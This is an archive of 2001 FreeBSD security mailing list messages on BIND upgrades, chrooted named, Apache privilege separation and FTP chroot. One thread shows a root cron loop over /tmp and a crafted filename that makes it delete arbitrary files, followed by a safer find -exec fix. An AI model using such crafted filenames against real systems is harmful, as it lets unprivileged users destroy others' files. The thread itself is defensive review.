Subject: Re: bind8.2.3 and installation problem Message-ID: <20010202013057.P479@puck.firepipe.net> Reply-To: Will Andrews Mail-Followup-To: Will Andrews , Wes Peters , Roger Marquis , security@FreeBSD.ORG References: <3A771A88.6F71AA2E@softweyr.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="n8rALO501tkk3VWH" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3A771A88.6F71AA2E@softweyr.com>; from wes@softweyr.com on Tue, Jan 30, 2001 at 12:48:24PM -0700 X-Operating-System: FreeBSD 4.2-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --n8rALO501tkk3VWH Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jan 30, 2001 at 12:48:24PM -0700, Wes Peters wrote: > Or, for an upgrade, >=20 > make deinstall reinstall Actually, it's more like this: [ update ] make clean deinstall make install The 'reinstall' target doesn't work like you think. If you have an old work directory it will just reinstall that. But anyway, I agree about what you said regarding QA. :-) --=20 wca --n8rALO501tkk3VWH Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6elQgF47idPgWcsURAsK+AJwPLeMCnntC4+Li4pKuSutV1mkDnACeJxN2 8b9H1lZFNPrYJXBjvjBKH/A= =XCBD -----END PGP SIGNATURE----- --n8rALO501tkk3VWH-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 22:31:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from proxy.OBK.ru (ovk.barrt.ru [194.84.233.130]) by hub.freebsd.org (Postfix) with ESMTP id 9221A37B4EC for ; Thu, 1 Feb 2001 22:31:30 -0800 (PST) Received: from localhost (subs@localhost) by proxy.OBK.ru (8.9.3/8.9.3) with ESMTP id MAA44705; Fri, 2 Feb 2001 12:31:10 +0600 (NOVT) (envelope-from subs@ovk.altai.ru) Date: Fri, 2 Feb 2001 12:31:10 +0600 (NOVT) From: "Yuri A. Wolf" X-Sender: subs@proxy.obk.ru To: Wes Peters Cc: freebsd-security@FreeBSD.ORG Subject: Re: bind8.2.3 - where is the correct place to download src? In-Reply-To: <3A7A47B7.242E4053@softweyr.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 1 Feb 2001, Wes Peters wrote: > "Yuri A. Wolf" wrote: > > actually I just checked there is bind-8.2.2.p7 in title at > > http://www.FreeBSD.org/ports/net.html and links to 8.2.3 on ftp.isc.org > > > > that's why i asked > > well, i'll try to download and make port again... but I'm not sure changes > > made... > > You can download and make the same port over and over again and it will > never change. If you want to get the update version, you will need to > update the port kit on your system, using CVSup or something like that. > For more information, see the FreeBSD Handbook on your system, look for > the topic "Keeping up to date with CVSup." > > -- Well, actually there were changes... I use FreeBSD-3.4-Stable at one of my computers here and I have the port collection from one of 4.x Releases... So, when I downloaded the port for bind-8 there the 'patch-ac' differed from the same I had. And that evening 'make' failed... The next morning I updated port again and did all the same way. All was okay - at the 'patch' stage. I just compared those files - the new one and the same in old ports: well - they are different, but I think the differences are another that were ones when I downloaded the new port at first time, or may be all the reasons in shaman's nature and Siberian weather =)) In any case, thank you for the answer. It's always pleasure to have in mind an idea that people here really help to each other to be always alert. -- Yuri A. Wolf wolf@OBK.ru #Unix System Administrator To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 23: 9:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 3157E37B4EC for ; Thu, 1 Feb 2001 23:09:39 -0800 (PST) Received: (qmail 2304 invoked by uid 1000); 2 Feb 2001 07:08:01 -0000 Date: Fri, 2 Feb 2001 09:08:01 +0200 From: Peter Pentchev To: disassembled Cc: Sam Wun , "Thomas T. Veldhouse" , freebsd-security@FreeBSD.ORG Subject: Re: ipmon and periodic Message-ID: <20010202090801.A328@ringworld.oblivion.bg> Mail-Followup-To: disassembled , Sam Wun , "Thomas T. Veldhouse" , freebsd-security@FreeBSD.ORG References: <3A7A180F.518292C1@esec.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from modulus@icmp.dhs.org on Thu, Feb 01, 2001 at 08:56:14PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Feb 01, 2001 at 08:56:14PM -0600, disassembled wrote: > > struct packet { > struct tcp_header foo; > struct ip_header var; > }; Mmmm I thought the IP header came before the TCP header? :) G'luck, Peter -- I am the thought you are now thinking. > If you want to get the size of a tcp packet, (in the psuedo code above > thats a valid example) > > the size of your tcp packet in bytes would be equal to: > > sizeof(packet); /* if you are familliar with C that is */ > > is generally a good place to start. > > hope this helps > > > > On Fri, 2 Feb 2001, Sam Wun wrote: > > > Hi, > > > > does anyone know how to convert a packet to number of bytes? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 2: 5:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from bws3.zenon.net (bws3.zenon.net [195.2.69.69]) by hub.freebsd.org (Postfix) with ESMTP id B36C537B4EC for ; Fri, 2 Feb 2001 02:05:02 -0800 (PST) Received: by bws3.zenon.net id f12A3gE94920, (ron@localhost); (8.11.0/vak/1.9) Fri, 2 Feb 2001 13:03:42 +0300 (MSK) Date: Fri, 2 Feb 2001 13:03:42 +0300 From: Roman Gnatenko To: FengYue Cc: Dag-Erling Smorgrav , Rossen Raykov , freebsd-security@FreeBSD.ORG Subject: Re: Ronning named in chroot env Message-ID: <20010202130342.C92089@zenon.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from fengyue@bluerose.windmoon.nu on Thu, Feb 01, 2001 at 09:26:06AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, On Thu, Feb 01, 2001 at 09:26:06AM -0800, FengYue wrote: > > On 1 Feb 2001, Dag-Erling Smorgrav wrote: > > Only if your named.conf has 'directory "/";' in the options section, > > and you don't have any slave zones, and you're not interested in any > > log messages your name server produces. Come to think of it, the fact > > that named is now unable to log error messages is probably the reason > > why you think it works just fine :) > > Yes, it doesn't have any slave zones, but I do miss the logs. > > I will use your patch then:) > > BTW, you have a typo for the link: > > http://people.freebsd.org/~des/software/> > > there is an extra '>' after software/ > > Thanks... > All the time configuration below work fine for me, I'm run named with -t option: options { directory "/"; pid-file "/run/named.pid"; named-xfer "/bin/named-xfer"; listen-on { 123.4.5.7; 127.0.0.1; }; transfer-source 123.4.5.7; query-source address 123.4.5.7 port 53; allow-transfer { my_acl; }; }; just compile named-xfer with -static and place to your /chroot/bin, to see what your named doing insert section like this into your named.conf logging { channel errchannel { file "log/errors"; severity info; print-time yes; print-category yes; print-severity yes; }; category default { errchannel; }; }; All files in /chroot must be root owned, except directory where bind placed secondary zones. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Roman Gnatenko Zenon N.S.P To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 2:55:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from prg.traveller.cz (prg.traveller.cz [193.85.2.2]) by hub.freebsd.org (Postfix) with ESMTP id 400F537B491 for ; Fri, 2 Feb 2001 02:55:24 -0800 (PST) Received: from prg.traveller.cz (prg.traveller.cz [193.85.2.2]) by prg.traveller.cz (8.9.3[EUnet-CZ](2)/8.9.3) with ESMTP id LAA03070 for ; Fri, 2 Feb 2001 11:55:22 +0100 (CET) Date: Fri, 2 Feb 2001 11:55:22 +0100 (CET) From: Michal Mertl To: security@freebsd.org Subject: strange dropped packets Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've installed and configured several FreeBSD boxes (>=4.1). On all of them I use log_in_vain="YES" in rc.conf. Sometime I also install ipfilter (with rules with minimal holes in and outbound traffic with "keep state"). Either with ipfilter installed or not I see dropped packets in /var/log/messages (result of log_in_vain) which seems to me like last packets of a regular communications open from inside (either UDP (dns queries) or TCP (mostly web)). It doesn't stop anything from working but I'm curious what it may mean. I think sometimes FreeBSD thinks tcp or udp connection is closed when the other end doesn't think so (and because the packets aren't catched by ipfilter I suspect the problem on FreeBSD's side). -- Michal Mertl mime@traveller.cz To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 3:22:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from mobile.wemm.org (c1315225-a.plstn1.sfba.home.com [65.0.135.147]) by hub.freebsd.org (Postfix) with ESMTP id 9476537B401 for ; Fri, 2 Feb 2001 03:22:35 -0800 (PST) Received: from netplex.com.au (localhost [127.0.0.1]) by mobile.wemm.org (8.11.1/8.11.1) with ESMTP id f12BK2W25943; Fri, 2 Feb 2001 03:20:02 -0800 (PST) (envelope-from peter@netplex.com.au) Message-Id: <200102021120.f12BK2W25943@mobile.wemm.org> X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 To: Sheldon Hearn Cc: Stu Pidaso , "Jacques A. Vidrine" , freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/login login.c In-Reply-To: <7897.980850042@axl.fw.uunet.co.za> Date: Fri, 02 Feb 2001 03:20:02 -0800 From: Peter Wemm Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sheldon Hearn wrote: > > > On Tue, 30 Jan 2001 05:08:09 EST, Stu Pidaso wrote: > > > > # Destroy all stale Kerberos5 tickets > > > # > > > for i in `find /tmp -name 'krb5cc_*' -ctime +1 -print` ; do > > > rm -f $i > > > done > > > > and now you can delete you can delete any file in /tmp. > > > > touch 'krb5cc_1 somefileintmp' and wait. > > Well spotted. > > find /tmp -name 'krb5cc_*' -ctime +1 -exec rm -f {} \; > > I don't use -delete because it's not portable. > > Of course, the problem is that maximum ticket lifetime is a site- > configurable value, which is why it _doesn't_ make sense to put this job > in /etc/crontab in the base system. > > The problem is that you can end up with a large number of stale files in > /tmp if you rely on users to run kdestroy religiously. Well, if the patches to add proper PAM session support to login etc get committed then there is an opportunity for the end-of-session cleanup to do this automatically. Cheers, -Peter -- Peter Wemm - peter@FreeBSD.org; peter@yahoo-inc.com; peter@netplex.com.au "All of this is for nothing if we don't go to the stars" - JMS/B5 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 4:25:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from mouse.gvr.org (madisongurkha6.iae.nl [212.61.21.69]) by hub.freebsd.org (Postfix) with ESMTP id CD9A237B4EC for ; Fri, 2 Feb 2001 04:25:23 -0800 (PST) Received: (from guido@localhost) by mouse.gvr.org (8.11.1/8.11.1) id f12CP4J08432; Fri, 2 Feb 2001 13:25:04 +0100 (CET) (envelope-from guido) Date: Fri, 2 Feb 2001 13:25:04 +0100 From: Guido van Rooij To: Matt Dillon Cc: Alfred Perlstein , Brian Behlendorf , Roman Shterenzon , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind Message-ID: <20010202132503.A2065@eniac.mpn.cp.philips.com> References: <20010131140447.E26076@fw.wintelcom.net> <20010131145423.H26076@fw.wintelcom.net> <200101312305.f0VN5vJ19469@earth.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200101312305.f0VN5vJ19469@earth.backplane.com>; from dillon@earth.backplane.com on Wed, Jan 31, 2001 at 03:05:57PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Jan 31, 2001 at 03:05:57PM -0800, Matt Dillon wrote: > Quite a few people have been using the sandbox options in the > last year without any ill effects (I was the original author of > the feature). The only issue is that you cannot HUP named (it will > not be able to rebind its sockets), you can only restart it, and > you have to supply the proper options to ndc when restarting it > (-u bind -g bind). I usually restart it anyway (I don't trust the > named HUP code). > IIRC you also should run syslogd such that named can log in the sandbox, e.g. with syslogd -l /sandbox/var/run/log -Guido To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 6:46:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from axp5.physik.fu-berlin.de (axp5.physik.fu-berlin.de [160.45.34.3]) by hub.freebsd.org (Postfix) with ESMTP id 8565D37B4EC for ; Fri, 2 Feb 2001 06:46:05 -0800 (PST) Received: from garfield.physik.fu-berlin.de (garfield.physik.fu-berlin.de [160.45.32.188]) by axp5.physik.fu-berlin.de (8.9.1a/8.9.1) with ESMTP id PAA07211 for ; Fri, 2 Feb 2001 15:46:02 +0100 (MET) Received: from localhost (stanciu@localhost) by garfield.physik.fu-berlin.de (8.11.1/8.9.3) with ESMTP id f12EjvQ06473 for ; Fri, 2 Feb 2001 15:46:01 +0100 (CET) (envelope-from stanciu@garfield.physik.fu-berlin.de) Date: Fri, 2 Feb 2001 15:45:57 +0100 (CET) From: Dacian Stanciu To: Subject: subscribe Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 9:51:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from harrier.prod.itd.earthlink.net (harrier.prod.itd.earthlink.net [207.217.121.12]) by hub.freebsd.org (Postfix) with ESMTP id 9745C37B401 for ; Fri, 2 Feb 2001 09:51:32 -0800 (PST) Received: from pavilion (user-33qts7u.dialup.mindspring.com [199.174.240.254]) by harrier.prod.itd.earthlink.net (EL-8_9_3_3/8.9.3) with SMTP id JAA14916 for ; Fri, 2 Feb 2001 09:51:30 -0800 (PST) Message-ID: <001101c08d40$c6159360$0101a8c0@pavilion> From: "Richard Ward" To: Subject: Apache uid/gid Date: Fri, 2 Feb 2001 12:50:21 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2014.211 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm not too sure this has anything to do with actual FreeBSD security, = though it has been on my mind for some time. I'm running Apache 1.3.12 = and it's binding to user and group id "nobody". When I start apache with = apachctl, it spawns the amount of daemons listed in httpd.conf, though = one of those spawns are running as root. I can kill the process running = as root and all is well. My question is: Is this a threat? Having this mystery process that's not = binding to the correct uid/gid specified, does it defeat the whole = purpose of binding Apache to it's own user/group? Thanks. -- Richard Ward, CEO richard@neonsky.net Neonsky Internet Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 9:54:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from faith.cs.utah.edu (faith.cs.utah.edu [155.99.198.108]) by hub.freebsd.org (Postfix) with ESMTP id 0B78137B65D for ; Fri, 2 Feb 2001 09:53:55 -0800 (PST) Received: (from danderse@localhost) by faith.cs.utah.edu (8.9.3/8.9.3) id KAA24081; Fri, 2 Feb 2001 10:53:46 -0700 (MST) Message-Id: <200102021753.KAA24081@faith.cs.utah.edu> Subject: Re: Apache uid/gid To: mh@neonsky.net (Richard Ward) Date: Fri, 2 Feb 2001 10:53:46 -0700 (MST) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <001101c08d40$c6159360$0101a8c0@pavilion> from "Richard Ward" at Feb 02, 2001 12:50:21 PM From: "David G. Andersen" X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The process running as root is the master process. Don't kill it, don't step on it, it's doing what you want. It doesn't handle requests; the non-root children do. You're right, btw - this has nothing to do with FreeBSD security. :) -Dave Lo and behold, Richard Ward once said: > > I'm not too sure this has anything to do with actual FreeBSD security, though it has been on my mind for some time. I'm running Apache 1.3.12 and it's binding to user and group id "nobody". When I start apache with apachctl, it spawns the amount of daemons listed in httpd.conf, though one of those spawns are running as root. I can kill the process running as root and all is well. > > My question is: Is this a threat? Having this mystery process that's not binding to the correct uid/gid specified, does it defeat the whole purpose of binding Apache to it's own user/group? > > Thanks. > -- > Richard Ward, CEO > richard@neonsky.net > Neonsky Internet Services > -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 9:57: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from harrier.prod.itd.earthlink.net (harrier.prod.itd.earthlink.net [207.217.121.12]) by hub.freebsd.org (Postfix) with ESMTP id 273C237B65D for ; Fri, 2 Feb 2001 09:56:48 -0800 (PST) Received: from pavilion (user-33qts7u.dialup.mindspring.com [199.174.240.254]) by harrier.prod.itd.earthlink.net (EL-8_9_3_3/8.9.3) with SMTP id JAA05767; Fri, 2 Feb 2001 09:56:44 -0800 (PST) Message-ID: <002701c08d41$810430a0$0101a8c0@pavilion> From: "Richard Ward" To: "David G. Andersen" Cc: References: <200102021753.KAA24081@faith.cs.utah.edu> Subject: Re: Apache uid/gid Date: Fri, 2 Feb 2001 12:56:42 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2014.211 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It doesn't handle requests? That's something I didn't know. Thanks for = shedding light on this, and sorry to those who are also saying "This has = nothing to do with FreeBSD security". -- Richard Ward, CEO richard@neonsky.net Neonsky Internet Services ----- Original Message -----=20 From: David G. Andersen To: Richard Ward Cc: Sent: Friday, February 02, 2001 12:53 PM Subject: Re: Apache uid/gid > The process running as root is the master process. Don't kill it, > don't step on it, it's doing what you want. It doesn't handle > requests; the non-root children do. >=20 > You're right, btw - this has nothing to do with FreeBSD security. :) >=20 > -Dave >=20 > Lo and behold, Richard Ward once said: > >=20 > > I'm not too sure this has anything to do with actual FreeBSD = security, though it has been on my mind for some time. I'm running = Apache 1.3.12 and it's binding to user and group id "nobody". When I = start apache with apachctl, it spawns the amount of daemons listed in = httpd.conf, though one of those spawns are running as root. I can kill = the process running as root and all is well. > >=20 > > My question is: Is this a threat? Having this mystery process that's = not binding to the correct uid/gid specified, does it defeat the whole = purpose of binding Apache to it's own user/group? > >=20 > > Thanks. > > -- > > Richard Ward, CEO > > richard@neonsky.net > > Neonsky Internet Services > >=20 >=20 >=20 > --=20 > work: dga@lcs.mit.edu me: dga@pobox.com > MIT Laboratory for Computer Science = http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 11:31:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from threat.tjhsst.edu (threat.tjhsst.edu [198.38.16.9]) by hub.freebsd.org (Postfix) with ESMTP id 476D237B491 for ; Fri, 2 Feb 2001 11:31:02 -0800 (PST) Received: (from abarros@localhost) by threat.tjhsst.edu (8.11.1/8.11.0) id f12JUt920504; Fri, 2 Feb 2001 14:30:55 -0500 Date: Fri, 2 Feb 2001 14:30:55 -0500 From: Andrew Barros To: Richard Ward Cc: "David G. Andersen" , freebsd-security@FreeBSD.ORG Subject: Re: Apache uid/gid Message-ID: <20010202143055.A20054@tjhsst.edu> Mail-Followup-To: Richard Ward , "David G. Andersen" , freebsd-security@FreeBSD.ORG References: <200102021753.KAA24081@faith.cs.utah.edu> <002701c08d41$810430a0$0101a8c0@pavilion> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="ikeVEW9yuYc//A+q" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <002701c08d41$810430a0$0101a8c0@pavilion>; from mh@neonsky.net on Fri, Feb 02, 2001 at 12:56:42PM -0500 X-Operating-System: Linux threat.tjhsst.edu 2.2.17 X-I-Graduate-In: 134.107685185185 days Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --ikeVEW9yuYc//A+q Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable You need to be root to open ports lower than 1024, this root owned process = only opens the port, reads oonfig files, and spawns children(with the corre= ct uid). -ajb On Fri, Feb 02, 2001 at 12:56:42PM -0500, Richard Ward wrote: ->It doesn't handle requests? That's something I didn't know. Thanks for sh= edding light on this, and sorry to those who are also saying "This has noth= ing to do with FreeBSD security". ->-- ->Richard Ward, CEO ->richard@neonsky.net ->Neonsky Internet Services -> -> ->----- Original Message -----=20 ->From: David G. Andersen ->To: Richard Ward ->Cc: ->Sent: Friday, February 02, 2001 12:53 PM ->Subject: Re: Apache uid/gid -> -> ->> The process running as root is the master process. Don't kill it, ->> don't step on it, it's doing what you want. It doesn't handle ->> requests; the non-root children do. ->>=20 ->> You're right, btw - this has nothing to do with FreeBSD security. :) ->>=20 ->> -Dave ->>=20 ->> Lo and behold, Richard Ward once said: ->> >=20 ->> > I'm not too sure this has anything to do with actual FreeBSD security= , though it has been on my mind for some time. I'm running Apache 1.3.12 an= d it's binding to user and group id "nobody". When I start apache with apac= hctl, it spawns the amount of daemons listed in httpd.conf, though one of t= hose spawns are running as root. I can kill the process running as root and= all is well. ->> >=20 ->> > My question is: Is this a threat? Having this mystery process that's = not binding to the correct uid/gid specified, does it defeat the whole purp= ose of binding Apache to it's own user/group? ->> >=20 ->> > Thanks. ->> > -- ->> > Richard Ward, CEO ->> > richard@neonsky.net ->> > Neonsky Internet Services ->> >=20 ->>=20 ->>=20 ->> --=20 ->> work: dga@lcs.mit.edu me: dga@pobox.com ->> MIT Laboratory for Computer Science http://www.angio.ne= t/ -> -> -> ->To Unsubscribe: send mail to majordomo@FreeBSD.org ->with "unsubscribe freebsd-security" in the body of the message ---end quoted text--- --=20 Andrew Barros PGP Key Fingerprint: D3B8 0800 C45A 143E 5CF0 E112 0A1B AB36 B655 1FB8 --ikeVEW9yuYc//A+q Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.3 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6ewrvChurNrZVH7gRAkbvAJ0a3T80igguWWqhFlyD5fzARULc2wCePL2W GarsLhskS9uW1uqEIyF+Shc= =BnVY -----END PGP SIGNATURE----- --ikeVEW9yuYc//A+q-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 11:47:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from stardustweb.net (stardustweb.net [198.172.37.1]) by hub.freebsd.org (Postfix) with ESMTP id 5680237B491 for ; Fri, 2 Feb 2001 11:46:56 -0800 (PST) Received: from 420 (SISP-dial-port-89.sonicisp.net [198.172.39.89]) by stardustweb.net (8.9.3/8.9.3) with SMTP id LAA56148 for ; Fri, 2 Feb 2001 11:43:47 -0800 (PST) (envelope-from jeff@stardustweb.net) Message-ID: <000e01c08d51$0b9ed580$0200a8c0@mshome.net> From: "jeff" To: Subject: ftp Date: Fri, 2 Feb 2001 11:47:57 -0800 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_000B_01C08D0D.FCB22B00" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_000B_01C08D0D.FCB22B00 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Im looking for a ftp client that will keep the user in there home dir a = lot of the new ftp software is letting users browse the server's other = dirs any scripts I can use that would handel this issuse Jeff Gray cfm ------=_NextPart_000_000B_01C08D0D.FCB22B00 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Im looking for a ftp client that will keep the user = in there=20 home dir a lot of the new ftp software is letting users browse the = server's=20 other dirs  any scripts I can use that would handel this=20 issuse
 
Jeff Gray cfm
 
------=_NextPart_000_000B_01C08D0D.FCB22B00-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 11:50:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id D4E2337B401 for ; Fri, 2 Feb 2001 11:50:26 -0800 (PST) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.1/8.11.1) with ESMTP id f12Jod140969; Fri, 2 Feb 2001 14:50:40 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Fri, 2 Feb 2001 14:50:39 -0500 (EST) From: Rob Simmons To: jeff Cc: security@FreeBSD.ORG Subject: Re: ftp In-Reply-To: <000e01c08d51$0b9ed580$0200a8c0@mshome.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ???? The server is what governs where the user can browse. Read the man page for ftpd, you will find that the /etc/ftpchroot controls what users are restricted to thier home directory. Robert Simmons Systems Administrator http://www.wlcg.com/ On Fri, 2 Feb 2001, jeff wrote: > Im looking for a ftp client that will keep the user in there home dir a lot of the new ftp software is letting users browse the server's other dirs any scripts I can use that would handel this issuse > > Jeff Gray cfm > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 11:54:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from omta04.mta.everyone.net (reports.everyone.net [216.200.145.62]) by hub.freebsd.org (Postfix) with ESMTP id 5196037B4EC for ; Fri, 2 Feb 2001 11:54:37 -0800 (PST) Received: from sitemail.everyone.net (reports [216.200.145.62]) by omta04.mta.everyone.net (Postfix) with ESMTP id 399184EE36; Fri, 2 Feb 2001 11:54:37 -0800 (PST) Received: by sitemail.everyone.net (Postfix, from userid 99) id E0F50274B; Fri, 2 Feb 2001 11:54:36 -0800 (PST) Content-Type: text/plain Content-Disposition: inline Mime-Version: 1.0 X-Mailer: MIME-tools 4.104 (Entity 4.117) Date: Fri, 2 Feb 2001 11:54:36 -0800 (PST) From: Benjamin Ossei To: Rob Simmons , jeff Cc: security@FreeBSD.ORG Subject: Re: ftp Reply-To: ben@cahostnet.net X-Originating-Ip: [162.6.224.88] Message-Id: <20010202195436.E0F50274B@sitemail.everyone.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org By default every user has rights to their own home directory. Unless the server isn't set correctly. Also if they happen to browse, they shouldn't be able to go into anyone elses directory. --- Rob Simmons > wrote: >???? The server is what governs where the user can browse. Read the man >page for ftpd, you will find that the /etc/ftpchroot controls what users >are restricted to thier home directory. > >Robert Simmons >Systems Administrator >http://www.wlcg.com/ > >On Fri, 2 Feb 2001, jeff wrote: > >> Im looking for a ftp client that will keep the user in there home dir a lot of the new ftp software is letting users browse the server's other dirs any scripts I can use that would handel this issuse >> >> Jeff Gray cfm >> >> > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message _____________________________________________________________ ========GET YOUR FREE E-MAIL============ http://freemail.cahostnet.net Web Hosting http://www.cahostnet.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 12: 3:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 7417037B401 for ; Fri, 2 Feb 2001 12:03:05 -0800 (PST) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.1/8.11.1) with ESMTP id f12K3L041782; Fri, 2 Feb 2001 15:03:21 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Fri, 2 Feb 2001 15:03:21 -0500 (EST) From: Rob Simmons To: Benjamin Ossei Cc: jeff , security@FreeBSD.ORG Subject: Re: ftp In-Reply-To: <20010202195436.E0F50274B@sitemail.everyone.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; 